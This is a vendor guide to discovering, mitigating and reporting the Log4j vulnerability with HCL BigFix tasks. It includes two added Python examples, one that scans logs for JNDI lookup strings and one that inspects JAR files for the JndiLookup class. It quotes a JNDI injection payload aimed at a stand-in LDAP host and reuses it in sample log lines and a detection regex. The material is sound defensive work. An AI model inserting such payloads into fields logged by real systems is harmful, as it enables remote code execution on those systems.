HCL BigFix Guide for Countering the Log4J Vulnerability
Nearly every global enterprise or organization is facing pressure to fix what experts are calling one of the most serious software vulnerabilities in recent memory. It’s ubiquitous and easy to exploit.
The flaw in the Log4j software could allow hackers unfettered access to computer systems and has prompted an urgent warning by the U.S. government’s cybersecurity agency.
Attacks took place less than a day after the vulnerability was reported. Currently, this vulnerability holds a risk matrix base score of 10 and has been labelled critical severity by the GitHub advisory.
What is it?
It is a vulnerability discovered in Apache Log4j, the popular Java library developed and maintained by the Apache foundation. The Log4j library is widely used in many commercial and open-source software products as a Java logging routine. The vulnerability scores 10/10 in the MITRE.org Common Vulnerability Scoring System (CVSS), indicating its severity.
How is it exploited?
Log4j can be exploited remotely by an unauthenticated adversary to achieve remote code execution (RCE). If an attacker sends a message that contains a string like ${jndi:ldap://dirtyLDAP.com/X}, an external code class or message lookup may result in the execution of malicious code WITHOUT authentication.
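The following added example (not HCL BigFix or Logpresso code) shows how a defender could search web or application logs for the lookup string quoted above and list the hosts it names for egress and DNS log review. The function names and the log lines are constructed for illustration; it matches only the literal and percent-encoded forms of that string, so an empty result is not proof that no attempt occurred.

```python
import re
from urllib.parse import unquote

# Literal lookup form shown above: ${jndi:<scheme>://<host>[:port][/path]}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?[^}\s]*\}",
    re.IGNORECASE,
)

def decode_fully(text, max_rounds=3):
    """Percent-decode a bounded number of times so encoded request fields match."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_jndi_lookups(lines):
    """Return one finding per JNDI lookup string seen in the given log lines."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for m in JNDI_RE.finditer(decode_fully(line)):
            findings.append({"line": lineno, "scheme": m["scheme"].lower(),
                             "host": m["host"].lower(), "lookup": m.group(0)})
    return findings

def callback_hosts(findings):
    """Distinct hosts named in lookups: candidates for egress and DNS log review."""
    return sorted({f["host"] for f in findings})

# Constructed access-log lines; the lookup string is the one quoted on this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://dirtyLDAP.com/X}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2FdirtyLDAP.com%2FX%7D HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.7 - - [12/Dec/2021:10:02:00 +0000] "GET /docs/jndi-overview HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    hits = find_jndi_lookups(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("hosts to review:", callback_hosts(hits))
```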
Who is impacted?
Hundreds of millions of devices are at risk, including government, commercial and home computers. In addition, each affected device may have dozens or hundreds of places where the vulnerable code resides, as logging is an extremely common action in all of computing.
How can HCL BigFix help?
The HCL BigFix team is working alongside our customers, security experts, and IT Operations to produce HCL BigFix content to help you identify and fix the Log4j vulnerabilities in your environment.
HCL BigFix is the essential tool for IT Operations. HCL BigFix automates discovery, management, and remediation of all endpoints whether on-premises, mobile, virtual, or in the cloud – regardless of the operating system, location, or connectivity. With HCL BigFix Insights for Vulnerability Remediation, which integrates with leading vulnerability management solutions like Tenable, vulnerabilities like Log4j can be remediated faster than any other solution in the market.
With HCL BigFix you can discover, mitigate, and remediate vulnerabilities, create pre- and post-remediation reports, and protect remediated endpoints.
DISCOVERY
HCL BigFix has developed tasks to help HCL BigFix users discover Log4J instances and vulnerabilities. We used the Logpresso Log4j scanner because it is an open-source Java-based scanner available on GitHub, developed by the Logpresso technical team, and is freely available to the cybersecurity community.
These tasks download a temporary Java runtime to execute the scan, and do not require Java to be installed on the system. These tasks work on Windows 8.1 and higher (x86 and x64), Mac OS X, Linux (x86, x64, armv7l, ppc64, ppc64LE, and s390x), AIX 7.1 TL4 and higher, and Solaris (x86 and SPARC). With a manual download of the JRE, the tasks can also execute on HP-UX.
The following four steps outline the general process for discovering and reporting on the vulnerability:
1. From the "BES Inventory and License" Content Site, execute Task 602 "Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – SCAN only".
2. From the "BES Inventory and License" Content Site, activate Analysis 601 "log4j2-scan results".
3. After scan results have been uploaded to the HCL BigFix Server, view detailed scan results in the Analysis. See the image below.
4. For Executive Reporting, use the "Log4j Vulnerability Report (Logpresso Scan)" view provided in HCL BigFix Web Reports.
MITIGATE
Prior to patches being made available from the application vendors, there are two ways to mitigate the Log4J risk:
1. Use the Logpresso Log4j-scan utility to remove vulnerable Java classes from the affected Log4j-core JAR files. The HCL BigFix task to do this is available from the "BES Inventory and License" Content Site. It is called Task 603 (Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – WITH REMEDIATION).
The Logpresso Log4j-scan utility can perform some remediations on affected Log4j-Core JAR libraries, for both Log4j 2.x and Log4j 1.x. The utility mitigates the worst of the CVEs but may not mitigate all denial-of-service based vulnerabilities. Nonetheless, the utility can be a very effective step in providing protection while maintaining backward-compatibility with existing applications. For details of the specific mitigations that can be performed by the tool, visit https://github.com/logpresso/CVE-2021-44228-Scanner.
2. Stop or disable the affected applications or services.
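To make concrete what the discovery scan and the class-removal mitigation look for inside a JAR, here is an added Python example (not the Logpresso scanner and not HCL BigFix content). It assumes the standard log4j-core layout, where the JNDI lookup class is org/apache/logging/log4j/core/lookup/JndiLookup.class and the version is recorded in the Maven pom.properties file; the function names and the sample archive are constructed for illustration.

```python
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear")

def inspect_archive(data, label, findings=None, depth=0, max_depth=4):
    """Report every log4j-core copy in an archive, including nested archives."""
    findings = [] if findings is None else findings
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # corrupt or non-zip file: skip it, keep scanning
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            version = "unknown"  # shaded copies may lack Maven metadata
            if POM_PROPS in names:
                props = zf.read(POM_PROPS).decode("utf-8", "replace")
                m = re.search(r"^version=(\S+)", props, re.MULTILINE)
                version = m.group(1) if m else version
            findings.append({"path": label, "version": version,
                             "jndi_lookup_present": JNDI_CLASS in names})
        for inner in sorted(names):
            if depth < max_depth and inner.lower().endswith(ARCHIVES):
                inspect_archive(zf.read(inner), f"{label}!/{inner}",
                                findings, depth + 1, max_depth)
    return findings

def make_zip(entries):
    """Build an in-memory archive from {name: bytes} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()

# Constructed sample: a WAR bundling one untouched and one mitigated log4j-core.
untouched = make_zip({POM_PROPS: b"version=2.14.1\n", JNDI_CLASS: b"\xca\xfe\xba\xbe"})
mitigated = make_zip({POM_PROPS: b"version=2.14.1\n"})
SAMPLE_WAR = make_zip({
    "WEB-INF/lib/log4j-core-2.14.1.jar": untouched,
    "WEB-INF/lib/patched/log4j-core-2.14.1.jar": mitigated,
    "WEB-INF/lib/notes.jar": b"not a zip",
})

if __name__ == "__main__":
    for finding in inspect_archive(SAMPLE_WAR, "app.war"):
        print(finding)
```

A copy that still reports its original version but has jndi_lookup_present set to False is what a library looks like after the class has been removed, which is why the version number alone does not show mitigation status.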
REMEDIATE
As vendors make patches available, HCL BigFix will quickly create, test and deliver HCL BigFix fixlets. Download the latest list of HCL BigFix fixlets that remediate Log4J vulnerabilities from https://www.hcltechsw.com/bigfix/log4j-ivr.
REPORT
With BigFix, reports of the affected systems and libraries can be viewed and archived using HCL BigFix Web Reports that show vulnerability and mitigation status across different points in time.
PROTECT
Once the vulnerability has been remediated, HCL BigFix can ensure it doesn’t reappear. With BigFix, you can schedule recurring scans using the available Detection Task so any new systems or software with the Log4J vulnerability can be identified and remediated.
If you need more assistance, search the HCL BigFix forum, contact HCL BigFix Professional Services or contact Technical Support.